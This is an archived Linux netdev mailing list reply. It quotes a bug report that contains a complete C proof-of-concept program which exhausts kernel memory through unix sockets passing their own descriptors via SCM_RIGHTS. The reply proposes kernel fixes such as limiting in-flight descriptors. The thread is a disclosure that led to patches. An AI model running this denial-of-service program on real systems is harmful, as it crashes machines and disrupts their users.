public inbox for netdev@vger.kernel.org
 help / color / mirror / Atom feed
From: Eric Dumazet <eric.dumazet@gmail.com>
To: Vegard Nossum <vegard.nossum@gmail.com>,
	David Miller <davem@davemloft.net>
Cc: LKML <linux-kernel@vger.kernel.org>,
	Andrew Morton <akpm@linux-foundation.org>,
	Eugene Teo <eugene@redhat.com>, netdev <netdev@vger.kernel.org>
Subject: Re: Unix socket local DOS (OOM)
Date: Wed, 24 Nov 2010 00:11:58 +0100	[thread overview]
Message-ID: <1290553918.2866.80.camel@edumazet-laptop> (raw)
In-Reply-To: <AANLkTi=Q967xpX0KLMwX-=_4_1AKO5wjHEuJ1TrNjCj9@mail.gmail.com>

Le mardi 23 novembre 2010 à 23:21 +0100, Vegard Nossum a écrit :
> Hi,
> 
> I found this program lying around on my laptop. It kills my box
> (2.6.35) instantly by consuming a lot of memory (allocated by the
> kernel, so the process doesn't get killed by the OOM killer). As far
> as I can tell, the memory isn't being freed when the program exits
> either. Maybe it will eventually get cleaned up the UNIX socket
> garbage collector thing, but in that case it doesn't get called
> quickly enough to save my machine at least.
> 
> #include <sys/mount.h>
> #include <sys/socket.h>
> #include <sys/un.h>
> #include <sys/wait.h>
> 
> #include <errno.h>
> #include <fcntl.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> 
> static int send_fd(int unix_fd, int fd)
> {
>         struct msghdr msgh;
>         struct cmsghdr *cmsg;
>         char buf[CMSG_SPACE(sizeof(fd))];
> 
>         memset(&msgh, 0, sizeof(msgh));
> 
>         memset(buf, 0, sizeof(buf));
>         msgh.msg_control = buf;
>         msgh.msg_controllen = sizeof(buf);
> 
>         cmsg = CMSG_FIRSTHDR(&msgh);
>         cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
>         cmsg->cmsg_level = SOL_SOCKET;
>         cmsg->cmsg_type = SCM_RIGHTS;
> 
>         msgh.msg_controllen = cmsg->cmsg_len;
> 
>         memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
>         return sendmsg(unix_fd, &msgh, 0);
> }
> 
> int main(int argc, char *argv[])
> {
>         while (1) {
>                 pid_t child;
> 
>                 child = fork();
>                 if (child == -1)
>                         exit(EXIT_FAILURE);
> 
>                 if (child == 0) {
>                         int fd[2];
>                         int i;
> 
>                         if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
>                                 goto out_error;
> 
>                         for (i = 0; i < 100; ++i) {
>                                 if (send_fd(fd[0], fd[0]) == -1)
>                                         goto out_error;
> 
>                                 if (send_fd(fd[1], fd[1]) == -1)
>                                         goto out_error;
>                         }
> 
>                         close(fd[0]);
>                         close(fd[1]);
>                         goto out;
> 
>                 out_error:
>                         fprintf(stderr, "error: %s\n", strerror(errno));
>                 out:
>                         exit(EXIT_SUCCESS);
>                 }
> 
>                 while (1) {
>                         pid_t kid;
>                         int status;
> 
>                         kid = wait(&status);
>                         if (kid == -1) {
>                                 if (errno == ECHILD)
>                                         break;
>                                 if (errno == EINTR)
>                                         continue;
> 
>                                 exit(EXIT_FAILURE);
>                         }
> 
>                         if (WIFEXITED(status)) {
>                                 if (WEXITSTATUS(status))
>                                         exit(WEXITSTATUS(status));
>                                 break;
>                         }
>                 }
>         }
> 
>         return EXIT_SUCCESS;
> }
> 
> 
> Vegard
> --

Hi Vegard

Do you have a patch to correct this problem ?

I suppose we should add a machine wide limit of pending struct
scm_fp_list. (percpu_counter I guess)

David, commit f8d570a4 added one "struct list_head list;" to struct
scm_fp_list, enlarging it by a two factor because of power of two
kmalloc() sizes.  (2048 bytes on 64bit arches instead of 1024
previously)

We might lower SCM_MAX_FD from 255 to 253 ?




       reply	other threads:[~2010-11-23 23:12 UTC|newest]

Thread overview: 12+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
     [not found] <AANLkTi=Q967xpX0KLMwX-=_4_1AKO5wjHEuJ1TrNjCj9@mail.gmail.com>
2010-11-23 23:11 ` Eric Dumazet [this message]
2010-11-23 23:25   ` Unix socket local DOS (OOM) Vegard Nossum
2010-11-24  0:09   ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
2010-11-24 19:17     ` David Miller
2010-11-24  9:18   ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
2010-11-24 14:44     ` Andi Kleen
2010-11-24 15:18       ` Eric Dumazet
2010-11-24 16:25         ` Andi Kleen
2010-11-24 17:14         ` David Miller
2010-11-26  8:50     ` Michal Hocko
2010-11-27  2:27       ` David Miller
2010-11-29 10:37         ` Michal Hocko

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=1290553918.2866.80.camel@edumazet-laptop \
    --to=eric.dumazet@gmail.com \
    --cc=akpm@linux-foundation.org \
    --cc=davem@davemloft.net \
    --cc=eugene@redhat.com \
    --cc=linux-kernel@vger.kernel.org \
    --cc=netdev@vger.kernel.org \
    --cc=vegard.nossum@gmail.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox